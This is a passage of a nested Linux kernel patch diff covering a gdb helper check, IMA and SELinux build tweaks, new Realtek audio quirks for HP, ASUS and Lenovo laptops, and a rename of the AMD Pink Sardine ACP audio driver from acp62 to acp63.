+     gdb.write("NOTE: gdb 7.2 or later required for Linux helper scripts to "
+               "work.\n")
+ else:
++    import linux.constants
++    if linux.constants.LX_CONFIG_DEBUG_INFO_REDUCED:
++        raise gdb.GdbError("Reduced debug information will prevent GDB "
++                           "from having complete types.\n")
+     import linux.utils
+     import linux.symbols
+     import linux.modules
+@@ -32,7 +36,6 @@ else:
+     import linux.lists
+     import linux.rbtree
+     import linux.proc
+-    import linux.constants
+     import linux.timerlist
+     import linux.clk
+     import linux.genpd
+diff --git a/security/integrity/ima/Kconfig b/security/integrity/ima/Kconfig
+index 39caeca474449..60a511c6b583e 100644
+--- a/security/integrity/ima/Kconfig
++++ b/security/integrity/ima/Kconfig
+@@ -8,7 +8,7 @@ config IMA
+ 	select CRYPTO_HMAC
+ 	select CRYPTO_SHA1
+ 	select CRYPTO_HASH_INFO
+-	select TCG_TPM if HAS_IOMEM && !UML
++	select TCG_TPM if HAS_IOMEM
+ 	select TCG_TIS if TCG_TPM && X86
+ 	select TCG_CRB if TCG_TPM && ACPI
+ 	select TCG_IBMVTPM if TCG_TPM && PPC_PSERIES
+diff --git a/security/selinux/Makefile b/security/selinux/Makefile
+index 7761624448826..0aecf9334ec31 100644
+--- a/security/selinux/Makefile
++++ b/security/selinux/Makefile
+@@ -23,8 +23,8 @@ ccflags-y := -I$(srctree)/security/selinux -I$(srctree)/security/selinux/include
+ $(addprefix $(obj)/,$(selinux-y)): $(obj)/flask.h
+ 
+ quiet_cmd_flask = GEN     $(obj)/flask.h $(obj)/av_permissions.h
+-      cmd_flask = scripts/selinux/genheaders/genheaders $(obj)/flask.h $(obj)/av_permissions.h
++      cmd_flask = $< $(obj)/flask.h $(obj)/av_permissions.h
+ 
+ targets += flask.h av_permissions.h
+-$(obj)/flask.h: $(src)/include/classmap.h FORCE
++$(obj)/flask.h $(obj)/av_permissions.h &: scripts/selinux/genheaders/genheaders FORCE
+ 	$(call if_changed,flask)
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index f70d6a33421d2..172ffc2c332b7 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9428,6 +9428,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8898, "HP EliteBook 845 G8 Notebook PC", ALC285_FIXUP_HP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x103c, 0x88d0, "HP Pavilion 15-eh1xxx (mainboard 88D0)", ALC287_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8902, "HP OMEN 16", ALC285_FIXUP_HP_MUTE_LED),
++	SND_PCI_QUIRK(0x103c, 0x8919, "HP Pavilion Aero Laptop 13-be0xxx", ALC287_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x896d, "HP ZBook Firefly 16 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x896e, "HP EliteBook x360 830 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8971, "HP EliteBook 830 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+@@ -9478,6 +9479,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b8d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8f, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b92, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b96, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8bf0, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x103f, "ASUS TX300", ALC282_FIXUP_ASUS_TX300),
+@@ -9500,6 +9502,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1427, "Asus Zenbook UX31E", ALC269VB_FIXUP_ASUS_ZENBOOK),
+ 	SND_PCI_QUIRK(0x1043, 0x1517, "Asus Zenbook UX31A", ALC269VB_FIXUP_ASUS_ZENBOOK_UX31A),
+ 	SND_PCI_QUIRK(0x1043, 0x1662, "ASUS GV301QH", ALC294_FIXUP_ASUS_DUAL_SPK),
++	SND_PCI_QUIRK(0x1043, 0x1683, "ASUS UM3402YAR", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x16b2, "ASUS GU603", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x16e3, "ASUS UX50", ALC269_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1740, "ASUS UX430UA", ALC295_FIXUP_ASUS_DACS),
+@@ -9689,6 +9692,8 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x22f1, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x22f2, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x22f3, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x2316, "Thinkpad P1 Gen 6", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x2317, "Thinkpad P1 Gen 6", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x2318, "Thinkpad Z13 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x2319, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x231a, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
+diff --git a/sound/soc/amd/Kconfig b/sound/soc/amd/Kconfig
+index 150786279257d..c88ebd84bdd50 100644
+--- a/sound/soc/amd/Kconfig
++++ b/sound/soc/amd/Kconfig
+@@ -129,10 +129,10 @@ config SND_SOC_AMD_RPL_ACP6x
+           If unsure select "N".
+ 
+ config SND_SOC_AMD_PS
+-        tristate "AMD Audio Coprocessor-v6.2 Pink Sardine support"
++        tristate "AMD Audio Coprocessor-v6.3 Pink Sardine support"
+         depends on X86 && PCI && ACPI
+         help
+-          This option enables Audio Coprocessor i.e ACP v6.2 support on
++          This option enables Audio Coprocessor i.e. ACP v6.3 support on
+           AMD Pink sardine platform. By enabling this flag build will be
+           triggered for ACP PCI driver, ACP PDM DMA driver.
+           Say m if you have such a device.
+diff --git a/sound/soc/amd/ps/acp62.h b/sound/soc/amd/ps/acp62.h
+deleted file mode 100644
+index 8b30aefa4cd05..0000000000000
+--- a/sound/soc/amd/ps/acp62.h
++++ /dev/null
+@@ -1,98 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0+ */
+-/*
+- * AMD ALSA SoC PDM Driver
+- *
+- * Copyright (C) 2022 Advanced Micro Devices, Inc. All rights reserved.
+- */
+-
+-#include <sound/acp62_chip_offset_byte.h>
+-
+-#define ACP_DEVICE_ID 0x15E2
+-#define ACP6x_REG_START		0x1240000
+-#define ACP6x_REG_END		0x1250200
+-#define ACP6x_DEVS		3
+-#define ACP6x_PDM_MODE		1
+-
+-#define ACP_SOFT_RESET_SOFTRESET_AUDDONE_MASK	0x00010001
+-#define ACP_PGFSM_CNTL_POWER_ON_MASK	1
+-#define ACP_PGFSM_CNTL_POWER_OFF_MASK	0
+-#define ACP_PGFSM_STATUS_MASK		3
+-#define ACP_POWERED_ON			0
+-#define ACP_POWER_ON_IN_PROGRESS	1
+-#define ACP_POWERED_OFF		2
+-#define ACP_POWER_OFF_IN_PROGRESS	3
+-
+-#define ACP_ERROR_MASK 0x20000000
+-#define ACP_EXT_INTR_STAT_CLEAR_MASK 0xFFFFFFFF
+-#define PDM_DMA_STAT 0x10
+-
+-#define PDM_DMA_INTR_MASK	0x10000
+-#define ACP_ERROR_STAT	29
+-#define PDM_DECIMATION_FACTOR	2
+-#define ACP_PDM_CLK_FREQ_MASK	7
+-#define ACP_WOV_MISC_CTRL_MASK	0x10
+-#define ACP_PDM_ENABLE		1
+-#define ACP_PDM_DISABLE		0
+-#define ACP_PDM_DMA_EN_STATUS	2
+-#define TWO_CH		2
+-#define DELAY_US	5
+-#define ACP_COUNTER	20000
+-
+-#define ACP_SRAM_PTE_OFFSET	0x03800000
+-#define PAGE_SIZE_4K_ENABLE	2
+-#define PDM_PTE_OFFSET		0
+-#define PDM_MEM_WINDOW_START	0x4000000
+-
+-#define CAPTURE_MIN_NUM_PERIODS     4
+-#define CAPTURE_MAX_NUM_PERIODS     4
+-#define CAPTURE_MAX_PERIOD_SIZE     8192
+-#define CAPTURE_MIN_PERIOD_SIZE     4096
+-
+-#define MAX_BUFFER (CAPTURE_MAX_PERIOD_SIZE * CAPTURE_MAX_NUM_PERIODS)
+-#define MIN_BUFFER MAX_BUFFER
+-
+-/* time in ms for runtime suspend delay */
+-#define ACP_SUSPEND_DELAY_MS	2000
+-
+-enum acp_config {
+-	ACP_CONFIG_0 = 0,
+-	ACP_CONFIG_1,
+-	ACP_CONFIG_2,
+-	ACP_CONFIG_3,
+-	ACP_CONFIG_4,
+-	ACP_CONFIG_5,
+-	ACP_CONFIG_6,
+-	ACP_CONFIG_7,
+-	ACP_CONFIG_8,
+-	ACP_CONFIG_9,
+-	ACP_CONFIG_10,
+-	ACP_CONFIG_11,
+-	ACP_CONFIG_12,
+-	ACP_CONFIG_13,
+-	ACP_CONFIG_14,
+-	ACP_CONFIG_15,
+-};
+-
+-struct pdm_stream_instance {
+-	u16 num_pages;
+-	u16 channels;
+-	dma_addr_t dma_addr;
+-	u64 bytescount;
+-	void __iomem *acp62_base;
+-};
+-
+-struct pdm_dev_data {
+-	u32 pdm_irq;
+-	void __iomem *acp62_base;
+-	struct snd_pcm_substream *capture_stream;
+-};
+-
+-static inline u32 acp62_readl(void __iomem *base_addr)
+-{
+-	return readl(base_addr);
+-}
+-
+-static inline void acp62_writel(u32 val, void __iomem *base_addr)
+-{
+-	writel(val, base_addr);
+-}
+diff --git a/sound/soc/amd/ps/acp63.h b/sound/soc/amd/ps/acp63.h
+new file mode 100644
+index 0000000000000..85f869c2229f5
+--- /dev/null
++++ b/sound/soc/amd/ps/acp63.h
+@@ -0,0 +1,98 @@
++/* SPDX-License-Identifier: GPL-2.0+ */
++/*
++ * AMD ALSA SoC PDM Driver
++ *
++ * Copyright (C) 2022 Advanced Micro Devices, Inc. All rights reserved.
++ */
++
++#include <sound/acp63_chip_offset_byte.h>
++
++#define ACP_DEVICE_ID 0x15E2
++#define ACP6x_REG_START		0x1240000
++#define ACP6x_REG_END		0x1250200
++#define ACP6x_DEVS		3
++#define ACP6x_PDM_MODE		1
++
++#define ACP_SOFT_RESET_SOFTRESET_AUDDONE_MASK	0x00010001
++#define ACP_PGFSM_CNTL_POWER_ON_MASK	1
++#define ACP_PGFSM_CNTL_POWER_OFF_MASK	0
++#define ACP_PGFSM_STATUS_MASK		3
++#define ACP_POWERED_ON			0
++#define ACP_POWER_ON_IN_PROGRESS	1
++#define ACP_POWERED_OFF		2
++#define ACP_POWER_OFF_IN_PROGRESS	3
++
++#define ACP_ERROR_MASK 0x20000000
++#define ACP_EXT_INTR_STAT_CLEAR_MASK 0xFFFFFFFF
++#define PDM_DMA_STAT 0x10
++
++#define PDM_DMA_INTR_MASK	0x10000
++#define ACP_ERROR_STAT	29
++#define PDM_DECIMATION_FACTOR	2
++#define ACP_PDM_CLK_FREQ_MASK	7
++#define ACP_WOV_MISC_CTRL_MASK	0x10
++#define ACP_PDM_ENABLE		1
++#define ACP_PDM_DISABLE		0
++#define ACP_PDM_DMA_EN_STATUS	2
++#define TWO_CH		2
++#define DELAY_US	5
++#define ACP_COUNTER	20000
++
++#define ACP_SRAM_PTE_OFFSET	0x03800000
++#define PAGE_SIZE_4K_ENABLE	2
++#define PDM_PTE_OFFSET		0
++#define PDM_MEM_WINDOW_START	0x4000000
++
++#define CAPTURE_MIN_NUM_PERIODS     4
++#define CAPTURE_MAX_NUM_PERIODS     4
++#define CAPTURE_MAX_PERIOD_SIZE     8192
++#define CAPTURE_MIN_PERIOD_SIZE     4096
++
++#define MAX_BUFFER (CAPTURE_MAX_PERIOD_SIZE * CAPTURE_MAX_NUM_PERIODS)
++#define MIN_BUFFER MAX_BUFFER
++
++/* time in ms for runtime suspend delay */
++#define ACP_SUSPEND_DELAY_MS	2000
++
++enum acp_config {
++	ACP_CONFIG_0 = 0,
++	ACP_CONFIG_1,
++	ACP_CONFIG_2,
++	ACP_CONFIG_3,
++	ACP_CONFIG_4,
++	ACP_CONFIG_5,
++	ACP_CONFIG_6,
++	ACP_CONFIG_7,
++	ACP_CONFIG_8,
++	ACP_CONFIG_9,
++	ACP_CONFIG_10,
++	ACP_CONFIG_11,
++	ACP_CONFIG_12,
++	ACP_CONFIG_13,
++	ACP_CONFIG_14,
++	ACP_CONFIG_15,
++};
++
++struct pdm_stream_instance {
++	u16 num_pages;
++	u16 channels;
++	dma_addr_t dma_addr;
++	u64 bytescount;
++	void __iomem *acp63_base;
++};
++
++struct pdm_dev_data {
++	u32 pdm_irq;
++	void __iomem *acp63_base;
++	struct snd_pcm_substream *capture_stream;
++};
++
++static inline u32 acp63_readl(void __iomem *base_addr)
++{
++	return readl(base_addr);
++}
++
++static inline void acp63_writel(u32 val, void __iomem *base_addr)
++{
++	writel(val, base_addr);
++}
+diff --git a/sound/soc/amd/ps/pci-ps.c b/sound/soc/amd/ps/pci-ps.c
+index dff2e2376bbf9..7c9751a7eedc2 100644
+--- a/sound/soc/amd/ps/pci-ps.c
++++ b/sound/soc/amd/ps/pci-ps.c
+@@ -15,30 +15,30 @@
+ #include <sound/pcm_params.h>
+ #include <linux/pm_runtime.h>
+ 
+-#include "acp62.h"
++#include "acp63.h"
+ 
+-struct acp62_dev_data {
+-	void __iomem *acp62_base;
++struct acp63_dev_data {
++	void __iomem *acp63_base;
+ 	struct resource *res;
+-	bool acp62_audio_mode;
++	bool acp63_audio_mode;
+ 	struct platform_device *pdev[ACP6x_DEVS];
+ };
+ 
+-static int acp62_power_on(void __iomem *acp_base)
++static int acp63_power_on(void __iomem *acp_base)
+ {
+ 	u32 val;
+ 	int timeout;
+ 
+-	val = acp62_readl(acp_base + ACP_PGFSM_STATUS);
++	val = acp63_readl(acp_base + ACP_PGFSM_STATUS);
+ 
+ 	if (!val)
+ 		return val;
+ 
+ 	if ((val & ACP_PGFSM_STATUS_MASK) != ACP_POWER_ON_IN_PROGRESS)
+-		acp62_writel(ACP_PGFSM_CNTL_POWER_ON_MASK, acp_base + ACP_PGFSM_CONTROL);
++		acp63_writel(ACP_PGFSM_CNTL_POWER_ON_MASK, acp_base + ACP_PGFSM_CONTROL);
+ 	timeout = 0;
+ 	while (++timeout < 500) {
+-		val = acp62_readl(acp_base + ACP_PGFSM_STATUS);
++		val = acp63_readl(acp_base + ACP_PGFSM_STATUS);
+ 		if (!val)
+ 			return 0;
+ 		udelay(1);
+@@ -46,23 +46,23 @@ static int acp62_power_on(void __iomem *acp_base)
+ 	return -ETIMEDOUT;
+ }
+ 
+-static int acp62_reset(void __iomem *acp_base)
++static int acp63_reset(void __iomem *acp_base)
+ {
+ 	u32 val;
+ 	int timeout;
+ 
+-	acp62_writel(1, acp_base + ACP_SOFT_RESET);
++	acp63_writel(1, acp_base + ACP_SOFT_RESET);
+ 	timeout = 0;
+ 	while (++timeout < 500) {
+-		val = acp62_readl(acp_base + ACP_SOFT_RESET);
++		val = acp63_readl(acp_base + ACP_SOFT_RESET);
+ 		if (val & ACP_SOFT_RESET_SOFTRESET_AUDDONE_MASK)
+ 			break;
+ 		cpu_relax();
+ 	}
+-	acp62_writel(0, acp_base + ACP_SOFT_RESET);
++	acp63_writel(0, acp_base + ACP_SOFT_RESET);
+ 	timeout = 0;
+ 	while (++timeout < 500) {
+-		val = acp62_readl(acp_base + ACP_SOFT_RESET);
++		val = acp63_readl(acp_base + ACP_SOFT_RESET);
+ 		if (!val)
+ 			return 0;
+ 		cpu_relax();
+@@ -70,57 +70,55 @@ static int acp62_reset(void __iomem *acp_base)
+ 	return -ETIMEDOUT;
+ }
+ 
+-static void acp62_enable_interrupts(void __iomem *acp_base)
++static void acp63_enable_interrupts(void __iomem *acp_base)
+ {
+-	acp62_writel(1, acp_base + ACP_EXTERNAL_INTR_ENB);
++	acp63_writel(1, acp_base + ACP_EXTERNAL_INTR_ENB);
+ }
+ 
+-static void acp62_disable_interrupts(void __iomem *acp_base)
++static void acp63_disable_interrupts(void __iomem *acp_base)
+ {
+-	acp62_writel(ACP_EXT_INTR_STAT_CLEAR_MASK, acp_base +
++	acp63_writel(ACP_EXT_INTR_STAT_CLEAR_MASK, acp_base +
+ 		     ACP_EXTERNAL_INTR_STAT);
+-	acp62_writel(0, acp_base + ACP_EXTERNAL_INTR_CNTL);
+-	acp62_writel(0, acp_base + ACP_EXTERNAL_INTR_ENB);
++	acp63_writel(0, acp_base + ACP_EXTERNAL_INTR_CNTL);
++	acp63_writel(0, acp_base + ACP_EXTERNAL_INTR_ENB);
+ }
+ 
+-static int acp62_init(void __iomem *acp_base, struct device *dev)
++static int acp63_init(void __iomem *acp_base, struct device *dev)
+ {
+ 	int ret;
+ 
+-	ret = acp62_power_on(acp_base);
++	ret = acp63_power_on(acp_base);
+ 	if (ret) {
+ 		dev_err(dev, "ACP power on failed\n");
+ 		return ret;
+ 	}
+-	acp62_writel(0x01, acp_base + ACP_CONTROL);
+-	ret = acp62_reset(acp_base);
++	acp63_writel(0x01, acp_base + ACP_CONTROL);
++	ret = acp63_reset(acp_base);
+ 	if (ret) {
+ 		dev_err(dev, "ACP reset failed\n");
+ 		return ret;
+ 	}
+-	acp62_writel(0x03, acp_base + ACP_CLKMUX_SEL);
+-	acp62_enable_interrupts(acp_base);
++	acp63_enable_interrupts(acp_base);
+ 	return 0;
+ }
+ 
+-static int acp62_deinit(void __iomem *acp_base, struct device *dev)
++static int acp63_deinit(void __iomem *acp_base, struct device *dev)
+ {
+ 	int ret;
+ 
+-	acp62_disable_interrupts(acp_base);
+-	ret = acp62_reset(acp_base);
++	acp63_disable_interrupts(acp_base);
++	ret = acp63_reset(acp_base);
+ 	if (ret) {
+ 		dev_err(dev, "ACP reset failed\n");
+ 		return ret;
+ 	}
+-	acp62_writel(0, acp_base + ACP_CLKMUX_SEL);
+-	acp62_writel(0, acp_base + ACP_CONTROL);
++	acp63_writel(0, acp_base + ACP_CONTROL);
+ 	return 0;
+ }
+ 
+-static irqreturn_t acp62_irq_handler(int irq, void *dev_id)
++static irqreturn_t acp63_irq_handler(int irq, void *dev_id)
+ {
+-	struct acp62_dev_data *adata;
++	struct acp63_dev_data *adata;
+ 	struct pdm_dev_data *ps_pdm_data;
+ 	u32 val;
+ 
+@@ -128,10 +126,10 @@ static irqreturn_t acp62_irq_handler(int irq, void *dev_id)
+ 	if (!adata)
+ 		return IRQ_NONE;
+ 
+-	val = acp62_readl(adata->acp62_base + ACP_EXTERNAL_INTR_STAT);
++	val = acp63_readl(adata->acp63_base + ACP_EXTERNAL_INTR_STAT);
+ 	if (val & BIT(PDM_DMA_STAT)) {
+ 		ps_pdm_data = dev_get_drvdata(&adata->pdev[0]->dev);
+-		acp62_writel(BIT(PDM_DMA_STAT), adata->acp62_base + ACP_EXTERNAL_INTR_STAT);
++		acp63_writel(BIT(PDM_DMA_STAT), adata->acp63_base + ACP_EXTERNAL_INTR_STAT);
+ 		if (ps_pdm_data->capture_stream)
+ 			snd_pcm_period_elapsed(ps_pdm_data->capture_stream);
+ 		return IRQ_HANDLED;
+@@ -139,10 +137,10 @@ static irqreturn_t acp62_irq_handler(int irq, void *dev_id)
+ 	return IRQ_NONE;
+ }
+ 
+-static int snd_acp62_probe(struct pci_dev *pci,
++static int snd_acp63_probe(struct pci_dev *pci,
+ 			   const struct pci_device_id *pci_id)
+ {
+-	struct acp62_dev_data *adata;
++	struct acp63_dev_data *adata;
+ 	struct platform_device_info pdevinfo[ACP6x_DEVS];
+ 	int index, ret;
+ 	int val = 0x00;
+@@ -157,7 +155,7 @@ static int snd_acp62_probe(struct pci_dev *pci,
+ 	case 0x63:
+ 		break;
+ 	default:
+-		dev_dbg(&pci->dev, "acp62 pci device not found\n");
++		dev_dbg(&pci->dev, "acp63 pci device not found\n");
+ 		return -ENODEV;
+ 	}
+ 	if (pci_enable_device(pci)) {
+@@ -170,7 +168,7 @@ static int snd_acp62_probe(struct pci_dev *pci,
+ 		dev_err(&pci->dev, "pci_request_regions failed\n");
+ 		goto disable_pci;
+ 	}
+-	adata = devm_kzalloc(&pci->dev, sizeof(struct acp62_dev_data),
++	adata = devm_kzalloc(&pci->dev, sizeof(struct acp63_dev_data),
+ 			     GFP_KERNEL);
+ 	if (!adata) {
+ 		ret = -ENOMEM;
+@@ -178,18 +176,18 @@ static int snd_acp62_probe(struct pci_dev *pci,
+ 	}
+ 
+ 	addr = pci_resource_start(pci, 0);
+-	adata->acp62_base = devm_ioremap(&pci->dev, addr,
++	adata->acp63_base = devm_ioremap(&pci->dev, addr,
+ 					 pci_resource_len(pci, 0));
+-	if (!adata->acp62_base) {
++	if (!adata->acp63_base) {
+ 		ret = -ENOMEM;
+ 		goto release_regions;
+ 	}
+ 	pci_set_master(pci);
+ 	pci_set_drvdata(pci, adata);
+-	ret = acp62_init(adata->acp62_base, &pci->dev);
++	ret = acp63_init(adata->acp63_base, &pci->dev);
+ 	if (ret)
+ 		goto release_regions;
+-	val = acp62_readl(adata->acp62_base + ACP_PIN_CONFIG);
++	val = acp63_readl(adata->acp63_base + ACP_PIN_CONFIG);
+ 	switch (val) {
+ 	case ACP_CONFIG_0:
+ 	case ACP_CONFIG_1:
+@@ -220,7 +218,7 @@ static int snd_acp62_probe(struct pci_dev *pci,
+ 			adata->res->flags = IORESOURCE_MEM;
+ 			adata->res->start = addr;
+ 			adata->res->end = addr + (ACP6x_REG_END - ACP6x_REG_START);
+-			adata->acp62_audio_mode = ACP6x_PDM_MODE;
++			adata->acp63_audio_mode = ACP6x_PDM_MODE;
+ 
+ 			memset(&pdevinfo, 0, sizeof(pdevinfo));
+ 			pdevinfo[0].name = "acp_ps_pdm_dma";
+@@ -248,7 +246,7 @@ static int snd_acp62_probe(struct pci_dev *pci,
+ 					ret = PTR_ERR(adata->pdev[index]);
+ 					goto unregister_devs;
+ 				}
+-				ret = devm_request_irq(&pci->dev, pci->irq, acp62_irq_handler,
++				ret = devm_request_irq(&pci->dev, pci->irq, acp63_irq_handler,
+ 						       irqflags, "ACP_PCI_IRQ", adata);
+ 				if (ret) {
+ 					dev_err(&pci->dev, "ACP PCI IRQ request failed\n");
+@@ -267,7 +265,7 @@ unregister_devs:
+ 	for (--index; index >= 0; index--)
+ 		platform_device_unregister(adata->pdev[index]);
+ de_init:
+-	if (acp62_deinit(adata->acp62_base, &pci->dev))
++	if (acp63_deinit(adata->acp63_base, &pci->dev))
+ 		dev_err(&pci->dev, "ACP de-init failed\n");
+ release_regions:
+ 	pci_release_regions(pci);
+@@ -277,46 +275,46 @@ disable_pci:
+ 	return ret;
+ }
+ 
+-static int __maybe_unused snd_acp62_suspend(struct device *dev)
++static int __maybe_unused snd_acp63_suspend(struct device *dev)
+ {
+-	struct acp62_dev_data *adata;
++	struct acp63_dev_data *adata;
+ 	int ret;
+ 
+ 	adata = dev_get_drvdata(dev);
+-	ret = acp62_deinit(adata->acp62_base, dev);
++	ret = acp63_deinit(adata->acp63_base, dev);
+ 	if (ret)
+ 		dev_err(dev, "ACP de-init failed\n");
+ 	return ret;
+ }
+ 
+-static int __maybe_unused snd_acp62_resume(struct device *dev)
++static int __maybe_unused snd_acp63_resume(struct device *dev)
+ {
+-	struct acp62_dev_data *adata;
++	struct acp63_dev_data *adata;
+ 	int ret;
+ 
+ 	adata = dev_get_drvdata(dev);
+-	ret = acp62_init(adata->acp62_base, dev);
++	ret = acp63_init(adata->acp63_base, dev);
+ 	if (ret)
+ 		dev_err(dev, "ACP init failed\n");
+ 	return ret;
+ }
+ 
+-static const struct dev_pm_ops acp62_pm_ops = {
+-	SET_RUNTIME_PM_OPS(snd_acp62_suspend, snd_acp62_resume, NULL)
+-	SET_SYSTEM_SLEEP_PM_OPS(snd_acp62_suspend, snd_acp62_resume)
++static const struct dev_pm_ops acp63_pm_ops = {
++	SET_RUNTIME_PM_OPS(snd_acp63_suspend, snd_acp63_resume, NULL)
++	SET_SYSTEM_SLEEP_PM_OPS(snd_acp63_suspend, snd_acp63_resume)
+ };
+ 
+-static void snd_acp62_remove(struct pci_dev *pci)
++static void snd_acp63_remove(struct pci_dev *pci)
+ {
+-	struct acp62_dev_data *adata;
++	struct acp63_dev_data *adata;
+ 	int ret, index;
+ 
+ 	adata = pci_get_drvdata(pci);
+-	if (adata->acp62_audio_mode == ACP6x_PDM_MODE) {
++	if (adata->acp63_audio_mode == ACP6x_PDM_MODE) {
+ 		for (index = 0; index < ACP6x_DEVS; index++)
+ 			platform_device_unregister(adata->pdev[index]);
+ 	}
+-	ret = acp62_deinit(adata->acp62_base, &pci->dev);
++	ret = acp63_deinit(adata->acp63_base, &pci->dev);
+ 	if (ret)
+ 		dev_err(&pci->dev, "ACP de-init failed\n");
+ 	pm_runtime_forbid(&pci->dev);
+@@ -325,25 +323,25 @@ static void snd_acp62_remove(struct pci_dev *pci)
+ 	pci_disable_device(pci);
+ }
+ 
+-static const struct pci_device_id snd_acp62_ids[] = {
++static const struct pci_device_id snd_acp63_ids[] = {
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, ACP_DEVICE_ID),
+ 	.class = PCI_CLASS_MULTIMEDIA_OTHER << 8,
+ 	.class_mask = 0xffffff },
+ 	{ 0, },
+ };
+-MODULE_DEVICE_TABLE(pci, snd_acp62_ids);
++MODULE_DEVICE_TABLE(pci, snd_acp63_ids);
+ 
+-static struct pci_driver ps_acp62_driver  = {
++static struct pci_driver ps_acp63_driver  = {
+ 	.name = KBUILD_MODNAME,
+-	.id_table = snd_acp62_ids,
+-	.probe = snd_acp62_probe,
+-	.remove = snd_acp62_remove,
++	.id_table = snd_acp63_ids,
++	.probe = snd_acp63_probe,
++	.remove = snd_acp63_remove,
+ 	.driver = {
+-		.pm = &acp62_pm_ops,
++		.pm = &acp63_pm_ops,
+ 	}
+ };
+ 
+-module_pci_driver(ps_acp62_driver);
++module_pci_driver(ps_acp63_driver);
+ 
+ MODULE_AUTHOR("Vijendar.Mukunda@amd.com");
+ MODULE_AUTHOR("Syed.SabaKareem@amd.com");
+diff --git a/sound/soc/amd/ps/ps-mach.c b/sound/soc/amd/ps/ps-mach.c
+index b3e97093481d2..3ffbe4fdafdfc 100644
+--- a/sound/soc/amd/ps/ps-mach.c
++++ b/sound/soc/amd/ps/ps-mach.c
+@@ -13,11 +13,11 @@
+ #include <linux/io.h>
+ #include <linux/dmi.h>
+ 
+-#include "acp62.h"
++#include "acp63.h"
+ 
+ #define DRV_NAME "acp_ps_mach"
+ 
+-SND_SOC_DAILINK_DEF(acp62_pdm,
++SND_SOC_DAILINK_DEF(acp63_pdm,
+ 		    DAILINK_COMP_ARRAY(COMP_CPU("acp_ps_pdm_dma.0")));
+ 
+ SND_SOC_DAILINK_DEF(dmic_codec,
+@@ -27,31 +27,31 @@ SND_SOC_DAILINK_DEF(dmic_codec,
+ SND_SOC_DAILINK_DEF(pdm_platform,
+ 		    DAILINK_COMP_ARRAY(COMP_PLATFORM("acp_ps_pdm_dma.0")));
+ 
+-static struct snd_soc_dai_link acp62_dai_pdm[] = {
++static struct snd_soc_dai_link acp63_dai_pdm[] = {
+ 	{
+-		.name = "acp62-dmic-capture",
++		.name = "acp63-dmic-capture",
+ 		.stream_name = "DMIC capture",
+ 		.capture_only = 1,
+-		SND_SOC_DAILINK_REG(acp62_pdm, dmic_codec, pdm_platform),
++		SND_SOC_DAILINK_REG(acp63_pdm, dmic_codec, pdm_platform),
+ 	},
+ };
+ 
+-static struct snd_soc_card acp62_card = {
+-	.name = "acp62",
++static struct snd_soc_card acp63_card = {
++	.name = "acp63",
+ 	.owner = THIS_MODULE,
+-	.dai_link = acp62_dai_pdm,
++	.dai_link = acp63_dai_pdm,
+ 	.num_links = 1,
+ };
+ 
+-static int acp62_probe(struct platform_device *pdev)
++static int acp63_probe(struct platform_device *pdev)
+ {
+-	struct acp62_pdm *machine = NULL;
++	struct acp63_pdm *machine = NULL;
+ 	struct snd_soc_card *card;
+ 	int ret;
+ 
+-	platform_set_drvdata(pdev, &acp62_card);
++	platform_set_drvdata(pdev, &acp63_card);
+ 	card = platform_get_drvdata(pdev);
+-	acp62_card.dev = &pdev->dev;
++	acp63_card.dev = &pdev->dev;
+ 
+ 	snd_soc_card_set_drvdata(card, machine);
+ 	ret = devm_snd_soc_register_card(&pdev->dev, card);
+@@ -64,15 +64,15 @@ static int acp62_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static struct platform_driver acp62_mach_driver = {
++static struct platform_driver acp63_mach_driver = {
+ 	.driver = {
